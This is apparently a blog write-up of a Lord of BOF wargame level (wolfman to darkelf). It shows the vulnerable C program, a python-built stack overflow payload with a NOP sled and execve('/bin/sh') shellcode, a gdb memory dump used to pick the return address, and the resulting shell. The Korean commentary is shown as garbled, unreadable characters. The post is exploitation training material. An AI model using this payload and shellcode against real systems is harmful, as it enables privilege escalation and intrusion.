Security Mode

wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of BOF

6. wolfman → darkelf

Kortsec1 2019. 5. 2. 18:06 
[wolfman@localhost wolfman]$ cat -n darkelf.c 
     1	/*
     2	        The Lord of the BOF : The Fellowship of the BOF
     3	        - darkelf 
     4	        - egghunter + buffer hunter + check length of argv[1]
     5	*/
     6	
     7	#include <stdio.h>
     8	#include <stdlib.h>
     9	
    10	extern char **environ;
    11	
    12	main(int argc, char *argv[])
    13	{
    14		char buffer[40];
    15		int i;
    16	
    17		if(argc < 2){
    18			printf("argv error\n");
    19			exit(0);
    20		}
    21	
    22		// egghunter 
    23		for(i=0; environ[i]; i++)
    24			memset(environ[i], 0, strlen(environ[i]));
    25	
    26		if(argv[1][47] != '\xbf')
    27		{
    28			printf("stack is still your friend.\n");
    29			exit(0);
    30		}
    31	
    32		// check the length of argument
    33		if(strlen(argv[1]) > 48){
    34			printf("argument is too long!\n");
    35			exit(0);
    36		}
    37	
    38		strcpy(buffer, argv[1]); 
    39		printf("%s\n", buffer);
    40	
    41	        // buffer hunter
    42	        memset(buffer, 0, 40);
    43	}

5. orc => wolfman ๋•Œ๋Š” argv[1]์—๋‹ค๊ฐ€ \x90 100๊ฐœ์™€ ์‰˜์ฝ”๋“œ๋ฅผ ๋ชจ๋‘ ๋„ฃ์–ด์„œ ํ’€์—ˆ์Šต๋‹ˆ๋‹ค. 

ํ•˜์ง€๋งŒ, ์ด๋ฒˆ์—๋Š” 32๋ฒˆ์งธ ์ค„์—์„œ ๋ถ€ํ„ฐ argv[1]์˜ ๊ธธ์ด๋ฅผ ์ œํ•œํ•˜๋„ค์š”..

 

๋จธ ๊ทธ๋Ÿผ argv[2]์—๋‹ค๊ฐ€ ๋„ฃ์œผ๋ฉด ๋˜์ง€์š”~

๋ฐ”๋กœ ํ•œ๋ฒˆ ํ•ด๋ณผ๊นŒ์š”?

[wolfman@localhost wolfman]$ ./test `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf " + 
"\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1
\x99\xb0\x0b\xcd\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)

coreํŒŒ์ผ ์“ฑ์“ฑ,,,

 

[wolfman@localhost wolfman]$ gdb -c core
#0  0xbfbfbfbf in ?? ()
(gdb) x/100wx $esp
0xbffffa60:	0x00000000	0xbffffaa4	0xbffffab4	0x40013868
0xbffffa70:	0x00000003	0x08048450	0x00000000	0x08048471
0xbffffa80:	0x08048500	0x00000003	0xbffffaa4	0x08048390
0xbffffa90:	0x0804864c	0x4000ae60	0xbffffa9c	0x40013e90
0xbffffaa0:	0x00000003	0xbffffba8	0xbffffbaf	0xbffffbe0
0xbffffab0:	0x00000000	0xbffffc5d	0xbffffc6f	0xbffffc87
0xbffffac0:	0xbffffca6	0xbffffcc8	0xbffffcd5	0xbffffe98
0xbffffad0:	0xbffffeb7	0xbffffed4	0xbffffee9	0xbfffff08
0xbffffae0:	0xbfffff13	0xbfffff2c	0xbfffff3c	0xbfffff44
0xbffffaf0:	0xbfffff4e	0xbfffff5e	0xbfffff6c	0xbfffff7a
0xbffffb00:	0xbfffff8b	0xbfffff96	0xbfffffa9	0xbfffffec
0xbffffb10:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffb20:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffb30:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffb40:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffb50:	0x000001f9	0x0000000c	0x000001f9	0x0000000d
0xbffffb60:	0x000001f9	0x0000000e	0x000001f9	0x00000010
0xbffffb70:	0x0f8bfbff	0x0000000f	0xbffffba3	0x00000000
0xbffffb80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffba0:	0x69000000	0x00363836	0x65742f2e	0x41007473
0xbffffbb0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbc0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbd0:	0x41414141	0x41414141	0xbf414141	0x00bfbfbf
0xbffffbe0:	0x90909090	0x90909090	0x90909090	0x90909090
(gdb) 
0xbffffbf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc40:	0x90909090	0x6850c031	0x68732f2f	0x69622f68
0xbffffc50:	0x50e3896e	0x99e18953	0x80cd0bb0	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd70:	0x00000000	0x00000000	0x00000000	0x00000000

\x90๊ฐ€ ๋ฐ”๋กœ ๋ณด์ด๋„ค์š” ๊ทธ๋Ÿผ๋˜ darkelf๋กœ ๋งˆ๋ฌด๋ฆฌํ•ฉ์‹œ๋‹ค~

 

[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44 + "\x10\xfc\xff\xbf " + 
"\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1
\x99\xb0\x0b\xcd\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
bash$ my-pass
euid = 506
kernel crashed
bash$

๋„ˆ๋ฌด ์‰ฝ์ง€ ์•Š๋‚˜์š”..ใ… ใ…  ์จ‹๋“  ์ด๋ ‡๊ฒŒ ๋˜ wolfman์„ ํด๋ฆฌ์–ดํ–ˆ์Šต๋‹ˆ๋‹ค~~

 

'wargame ๐Ÿดโ€โ˜ ๏ธ write-up > Lord of BOF' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

8. orge โ†’ troll  (0) 2020.12.13
7. darkelf โ†’ orge  (0) 2020.12.13
5. orc โ†’ wolfman  (0) 2019.05.02
4. goblin โ†’ orc  (0) 2018.07.26

'wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of BOF'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€6. wolfman → darkelf

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”